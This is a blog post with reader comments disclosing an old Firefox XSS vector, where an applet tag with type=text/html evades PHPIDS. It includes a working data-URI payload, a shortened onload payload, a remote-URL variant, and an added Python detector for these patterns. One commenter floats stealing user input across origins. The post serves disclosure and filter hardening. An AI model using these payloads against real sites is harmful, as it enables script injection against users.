Firefox applet fun

I’ve been hacking on PHPIDS recently and I wanted a pure XSS vector, not just script execution, so I decided to experiment with the applet tag because it sneaks past the malicious tag detection. I thought to myself: I wonder if it accepts the type attribute like the object tag does….

<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html>

That works: it executes the base64-encoded string as HTML! It doesn’t stop there though 🙂

<applet src="http://www.businessinfo.co.uk" type=text/html>

The applet tag even acts like an iframe 😀
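As an added example (not code from the post or from PHPIDS), here is a small Python detector that shows why a tag-name denylist misses these vectors and what an attribute-aware check over applet/object/embed/iframe elements catches instead: a type=text/html attribute, a data: URI whose base64 body carries inline script, a remote document URL, and event handlers. The sample inputs are the vectors quoted on this page plus a constructed benign applet; the denylist shape and all function names are assumptions, not PHPIDS’s actual rules.

```python
import re
import base64

# Constructed samples: the vectors quoted in the post, the shortened form from
# the comments, and one benign applet element for comparison.
SAMPLES = {
    "data_uri": '<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html>',
    "remote": '<applet src="http://www.businessinfo.co.uk" type=text/html>',
    "short": '<applet/src/type=text/html onload=alert(1)',
    "benign": '<applet code="Clock.class" width=100 height=100></applet>',
}

# Tag-name denylist of the kind the post says the vector slips past (assumed shape).
DENIED_TAGS = {"script", "iframe", "object", "embed"}

TAG_RE = re.compile(r'<\s*([a-zA-Z][a-zA-Z0-9]*)((?:"[^"]*"|\'[^\']*\'|[^>"\'])*)')
# '/' is accepted as an attribute separator, which is why <applet/src/type=...
# parses as three attributes; a '/' inside a value such as text/html is kept.
ATTR_RE = re.compile(r'''[\s/]*([^\s/=>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s>]*))?''')

def parse_tags(markup):
    """Yield (tag_name, {attr: value}) for every start tag in markup."""
    for m in TAG_RE.finditer(markup):
        attrs = {}
        for a in ATTR_RE.finditer(m.group(2)):
            attrs[a.group(1).lower()] = (a.group(2) or "").strip("\"'")
        yield m.group(1).lower(), attrs

def naive_tag_check(markup):
    """Flag on tag name only; never fires on applet."""
    return any(tag in DENIED_TAGS for tag, _ in parse_tags(markup))

def attribute_aware_check(markup):
    """Return the reasons an embedding element should be rejected ([] if clean)."""
    reasons = []
    for tag, attrs in parse_tags(markup):
        if tag not in ("applet", "object", "embed", "iframe"):
            continue
        if attrs.get("type", "").lower().startswith("text/html"):
            reasons.append(f"{tag} with type=text/html renders as a document")
        src = attrs.get("src") or attrs.get("data", "")
        if src.lower().startswith("data:"):
            head, _, payload = src.partition(",")
            if ";base64" in head:  # re-pad, the posted vector omits the trailing '='
                payload = base64.b64decode(payload + "=" * (-len(payload) % 4)).decode("latin-1")
            if "<script" in payload.lower():
                reasons.append(f"{tag} data: URI carries inline script")
        elif src.lower().startswith(("http://", "https://")):
            reasons.append(f"{tag} loads a remote document: {src}")
        reasons += [f"{tag} has event handler {k}" for k in attrs if k.startswith("on")]
    return reasons
```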

13 Responses to “Firefox applet fun”

  1. ehmo writes:

    hey man, nice find.

  2. Gareth Heyes writes:

    @ehmo

    Thx, it was fun to find 🙂

  3. Gareth Heyes writes:

    Here’s a shortened XSS vector:-
    <applet/src/type=text/html onload=alert(1)

  4. daniel writes:

    My only issue would be sites that use strict XHTML, this would be rendered useless, no?

  5. Gareth Heyes writes:

    @daniel

    I ran a test in strict HTML and it still seemed to work.

  6. daniel writes:

    interesting, damn good find then sir!

  7. Alex writes:

    Which version of Firefox did you use ? I tried it with Firefox 3 RC1 and it didn’t work.

  8. Gareth Heyes writes:

    @Alex

    Not tried with beta but it works with latest FF2

  9. Alex writes:

    I’ve tested it with the latest FF2. Now it works.
    It’s time to try accessing any property or value from outside that “iframe”. Maybe we can bypass the same origin policy and steal user input from within this “iframe”.

  10. Gareth Heyes writes:

    @Alex

    Yeah I thought that might be possible but it appears that the properties can’t be accessed using “this” and the frames array. However if you can prove me wrong then I’d be very interested on how to do it 🙂

  11. Alex writes:

    I’ve tried some code to access data from within this “iframe”, but you’re right so far. ’til now I didn’t manage to get around the protection.

  12. .mario writes:

    Nice stuff Gareth – finally a “real” XSS again 😉 Has been a pretty long time. The issues are fixed in the trunk – 0.4.8 as soon as I return from OWASP Europe.

  13. Gareth Heyes writes:

    @.mario

    Thx, I knew about the applet tag insert for a while but I didn’t think it was exploitable. It was good fun to find 😀 Good luck with the conference.